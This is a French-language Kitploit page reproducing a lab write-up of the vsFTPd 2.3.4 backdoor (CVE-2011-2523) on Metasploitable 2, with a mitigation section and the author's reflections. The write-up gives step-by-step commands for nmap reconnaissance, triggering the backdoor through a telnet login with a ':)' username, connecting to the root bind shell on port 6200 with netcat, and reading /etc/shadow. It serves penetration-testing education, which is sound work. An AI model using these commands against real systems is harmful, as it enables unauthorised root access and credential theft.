Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
metasploitable2-vsftpd-exploitation — Projet : exploitation de la porte dérobée de vsFTPd 2.3.4 (CVE-2011-2523) sur Metasploitable 2 | Kitploit
Outils/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
Cassage de Mots de PasseEscalade de PrivilègesReconnaissanceCartographie RéseauScan de PortsAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'Intrusion

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Apprentissage et Éducation
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

Projet : exploitation de la porte dérobée de vsFTPd 2.3.4 (CVE-2011-2523) sur Metasploitable 2

Voir le dépôt
il y a 4 moisPas encore vérifié
Partager

Metasploitable 2 - Laboratoire d'exploitation de vsFTPd 2.3.4

Aperçu

Ce projet illustre un workflow de test de pénétration contre une machine délibérément vulnérable, Metasploitable 2. L'objectif était d'identifier, d'exploiter et d'analyser une vulnérabilité connue du service FTP, en obtenant finalement un accès root et en évaluant l'impact sécuritaire.


Configuration du laboratoire

  • Machine attaquante : Ubuntu (machine virtuelle)
  • Machine cible : Metasploitable 2 (machine virtuelle)
  • Configuration réseau : Réseau hôte uniquement (192.168.56.0/24)

Vérification de la cible

Vérification du système cible et de sa configuration réseau :

root@kitploit:~
whoami
hostname
ifconfig

Vérification de la configuration cible


Vérification de la connectivité

Confirmation de la connectivité réseau entre l'attaquant et la cible :

root@kitploit:~
ping 192.168.56.101

Vérification de la connectivité ping


Objectifs

  • Effectuer une reconnaissance réseau
  • Identifier les services exposés
  • Détecter les logiciels vulnérables
  • Exploiter une porte dérobée connue
  • Obtenir un accès root
  • Mener une analyse post-exploitation

Outils utilisés

  • Nmap
  • Telnet
  • Netcat
  • Linux (VM Ubuntu)

Résumé du déroulement de l'attaque

  1. Vérification de la configuration et de la connectivité de la cible
  2. Découverte de l'hôte cible sur le réseau local
  3. Identification des ports ouverts et des services exposés
  4. Détection du service FTP vulnérable (vsFTPd 2.3.4)
  5. Déclenchement de la porte dérobée via une connexion FTP forgée
  6. Obtention de l'accès root via le shell lié
  7. Réalisation d'un inventaire post-exploitation

Reconnaissance

Réalisation de la découverte d'hôtes :

root@kitploit:~
nmap -sn 192.168.56.0/24

Identification des hôtes actifs sur le réseau.

Scan de découverte d'hôtes


Scan de ports

root@kitploit:~
nmap 192.168.56.101

Découverte de plusieurs ports ouverts, dont :

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 445 (SMB)

Résultats du scan de ports


Énumération des services

root@kitploit:~
nmap -sV 192.168.56.101

Identification du service FTP en cours d'exécution :

root@kitploit:~
vsFTPd 2.3.4

Un scan complet des services et des scripts est inclus dans les fichiers d'accompagnement : Sortie du scan Nmap.

Énumération des services


Identification de la vulnérabilité

Le service FTP exécutait une version vulnérable connue :

vsFTPd 2.3.4

Cette version de vsFTPd a été distribuée avec une porte dérobée malveillante qui se déclenche lorsqu'un nom d'utilisateur contenant :) est utilisé lors de l'authentification. Une fois activée, le service ouvre un shell lié (bind shell) sur le port 6200, permettant un accès distant non autorisé.


Exploitation (manuelle)

Déclenchement de la porte dérobée via Telnet :

root@kitploit:~
telnet 192.168.56.101 21
root@kitploit:~
USER test:)
PASS test

Déclenchement de la porte dérobée via Telnet


Accès au shell

Connexion à la porte dérobée via Netcat :

root@kitploit:~
nc 192.168.56.101 6200

Connexion au shell lié


Résultat

root@kitploit:~
whoami
root@kitploit:~
root

Accès root obtenu avec succès

Preuve d'accès root


Post-exploitation

Après avoir obtenu l'accès root, un inventaire de base du système a été réalisé :

root@kitploit:~
cat /etc/passwd
cat /etc/shadow
  • Énumération des utilisateurs et comptes de services du système
  • Récupération des identifiants hachés depuis /etc/shadow
  • Démonstration de l'accès aux fichiers système sensibles

Énumération des utilisateurs

Accès au fichier shadow


Impact

  • Compromission totale du système (accès root)
  • Capacité à exécuter des commandes arbitraires
  • Exposition de données d'identification sensibles
  • Risque de mouvement latéral au sein d'un réseau

Atténuation

  • Supprimer ou désactiver le service FTP s'il n'est pas nécessaire
  • Mettre à jour les logiciels vulnérables vers des versions sécurisées
  • Remplacer les protocoles non sécurisés (comme le FTP non chiffré) par des alternatives sécurisées (SFTP)
  • Restreindre l'accès aux services critiques via des règles de pare-feu
  • Mettre en place une journalisation et une surveillance
  • Appliquer des politiques d'authentification fortes

Fichiers d'accompagnement

  • Sortie du scan Nmap

Point clé

Ce laboratoire montre comment un seul service vulnérable peut conduire à une compromission totale du système. Il souligne l'importance d'une configuration correcte des services, de la gestion des correctifs et de la minimisation des surfaces d'attaque exposées.

Ce que j'ai appris

C'était la première fois que j'exploitais manuellement une porte dérobée réelle. J'ai appris comment une simple chaîne de nom d'utilisateur malveillante (:)) peut déclencher un accès root, ce qui a renforcé l'importance de l'énumération des services et de la détection de versions lors de la reconnaissance. Je me suis également familiarisé avec des commandes basiques de post-exploitation sous Linux, comme la lecture de /etc/shadow et la compréhension de l'apparence réelle des identifiants hachés.

Limites

Il s'agissait d'un environnement de laboratoire contrôlé utilisant Metasploitable 2, une machine délibérément vulnérable. La porte dérobée de vsFTPd 2.3.4 est un CVE connu (CVE-2011-2523) datant de 2011, ce qui ne reflète pas un engagement réel moderne. Dans un test réel, des étapes supplémentaires comme l'évasion, le contournement de la journalisation ou le pivotement seraient nécessaires. Ce projet s'est concentré sur la compréhension des mécanismes fondamentaux de l'exploit, et non sur un test de pénétration complet.

Télécharger l’outil